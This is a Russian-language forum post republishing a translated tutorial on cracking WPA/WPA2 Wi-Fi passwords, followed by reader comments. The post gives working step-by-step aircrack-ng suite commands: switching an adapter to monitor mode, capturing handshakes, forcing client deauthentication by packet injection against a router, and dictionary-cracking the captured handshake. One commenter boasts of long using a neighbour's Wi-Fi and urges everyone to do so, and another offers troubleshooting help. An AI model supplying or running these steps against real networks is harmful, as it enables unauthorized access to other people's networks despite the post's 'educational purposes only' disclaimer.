Взлом Wi-Fi-сетей, защищённых WPA и WPA2

Специальный корреспондент
Собака

Собака

Пресс-служба
Команда форума
Private Club
Регистрация
13/10/15
Сообщения
54.953
Репутация
62.740
Реакции
277.163
RUB
0
Автор статьи, перевод которой мы сегодня публикуем, хочет рассказать о том, как взломать Wi-Fi-сеть, для защиты которой используются протоколы WPA и WPA2.



Статья написана исключительно в ознакомительных целях
Аппаратное и программное обеспечение

Я буду пользоваться дистрибутивом Kali Linux, установленным на VMware Workstation.

Кроме того, в моём распоряжении имеется Wi-Fi-адаптер Alfa AWUS036NH 2000mW 802.11b/g/n. Вот его основные характеристики:


  • Стандарты: IEEE 802.11b/g/n, USB 2.0.
  • Скорости передачи данных: 802.11b — 11 Мбит/с, 802.11g — 54 Мбит/с, 802.11n — 150 Мбит/с.
  • Разъём для подключения антенны: 1 x RP-SMA.
  • Частотные диапазоны: 2412~2462 МГц, 2412~2472 МГц, 2412~2484 МГц.
  • Питание: 5В.
  • Безопасность: WEP 64/128, поддержка 802.1X, WPS, WPA-PSK, WPA2.

Шаг 1

Нужно запустить Kali Linux в VMware и подключить к системе Wi-Fi-адаптер Alfa AWUS036NH, выполнив следующую последовательность действий:

VM > Removable Devices > Ralink 802.11n USB Wireless Lan Card > Connect



cf1f7b1e485509412012b76b5402c048.png


Подключение Wi-Fi-адаптера к ОС, работающей в VMware

Шаг 2

Теперь обратите внимание на средства управления Wi-Fi-подключениями в Kali Linux.


39a885f2ad7d8c2dd278a54d136bb344.png


Управление Wi-Fi-подключениями в Kali Linux

Шаг 3

Откройте терминал и выполните команду airmon-ng для вывода сведений об интерфейсах беспроводных сетей.


a1da927db678a772ac3d040c8f34f13a.png


Вывод сведений об интерфейсах беспроводных сетей

Шаг 4

Как видно, интерфейсу назначено имя wlan0. Зная это, выполним в терминале команду airmon-ng start wlan0. Благодаря этой команде Wi-Fi-адаптер будет переведён в режим мониторинга.


1c86b6246136df935e25652d2e37d0eb.png


Перевод адаптера в режим мониторинга

Шаг 5

Теперь выполните такую команду: airodump-ng wlan0mon. Это позволит получить сведения о Wi-Fi-сетях, развёрнутых поблизости, о том, какие методы шифрования в них используются, а так же — о SSID.


158f5994b7947fe3782b7bb2f76ea439.png


Сведения о Wi-Fi-сетях

Шаг 6

Теперь воспользуемся такой командой:

airodump-ng -c [channel] –bssid [bssid] -w /root/Desktop/ [monitor interface]


В ней [channel] надо заменить на номер целевого канала, [bssid] — на целевой BSSID, [monitor interface] — на интерфейс мониторинга wlan0mon.

В результате моя команда будет выглядеть так:

airodump-ng -c 6 –bssid 4C:ED:FB:8A:4F:C0 -w /root/Desktop/ wlan0mon



4ab3020f750219eb031375b424eb8afc.png


Выполнение команды

Шаг 7

Теперь нужно подождать. Утилита airodump будет мониторить сеть, ожидая момента, когда кто-нибудь к ней подключится. Это даст нам возможность получить handshake-файлы, которые будут сохранены в папке /root/Desktop.

Вот как выглядит работа утилиты до того момента, как кто-то подключился к исследуемой сети.


3e6e436221074a096c19f542c3b2d773.png


Программа наблюдает за сетью

А вот что происходит после того, как то-то к сети подключился, и программе удалось получить нужные данные.


5a313279c390e9baeea5a2e78a2d3081.png


Получение необходимых данных

Шаг 8

Вы можете пропустить этот шаг в том случае, если у вас уже есть handshake-файлы. Здесь описан альтернативный способ получения соответствующих данных.

Речь идёт об использовании следующей команды:

aireplay-ng -0 2 -a [router bssid] -c [client bssid] wlan0mon


Здесь [router bssid] нужно заменить на BSSID Wi-Fi-сети, а [client bssid] — на идентификатор рабочей станции.

Эта команда позволяет получить handshake-данные в том случае, если вам не хочется ждать момента чьего-либо подключения к сети. Фактически, эта команда атакует маршрутизатор, выполняя внедрение пакетов. Параметр -0 2 можно заменить другим числом, например, указать тут число 50, или большее число, и дождаться получения handshake-данных


d60690ac1f0dc3271f76a4bfed9eeced.png


Использование утилиты aireplay-bg

Шаг 9

Теперь воспользуемся такой командой:

aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap



  • -a2 означает WPA.
  • -b — это BSSID сети.
  • -w — это путь к списку паролей.
  • *.cap — это шаблон имён файлов, содержащих пароли.

В моём случае эта команда выглядит так:

aircrack-ng -a2 -b 4C:ED:FB:8A:4F:C0 -w /root/Desktop/ww.txt /root/Desktop/*.cap


После выполнения этой команды начнётся процесс взлома пароля. Если пароль будет успешно взломан — вы увидите что-то, похожее на следующий скриншот.


2146e66b89f5fbc1549e7c04d0c76a5b.png


Успешный взлом пароля





 
Будет полезно, спасибо
 
У меня на 5 шаге постоянно сканирует сети и нет возможности ввести команду для следующего шага.
Подскажите, что делать?
 
Давно использую вайфай соседа. И всем советую:dance2:
 
Возможно ли перевести свою встроенную карточку в режим сканирования?
 
У меня на 5 шаге постоянно сканирует сети и нет возможности ввести команду для следующего шага.
Подскажите, что делать?
Используйте дистрибутив WiFiSlax вместо кали. Там несколько полуавтоматических утилит, в том числе и с графическим интерфейсом.
И нет нужды писать много букофф в терминале.

Возможно ли перевести свою встроенную карточку в режим сканирования?
Зависит от модели карты
 
  • Нравится
Реакции: LOIZ
годно, спасибо
 
Сверху Снизу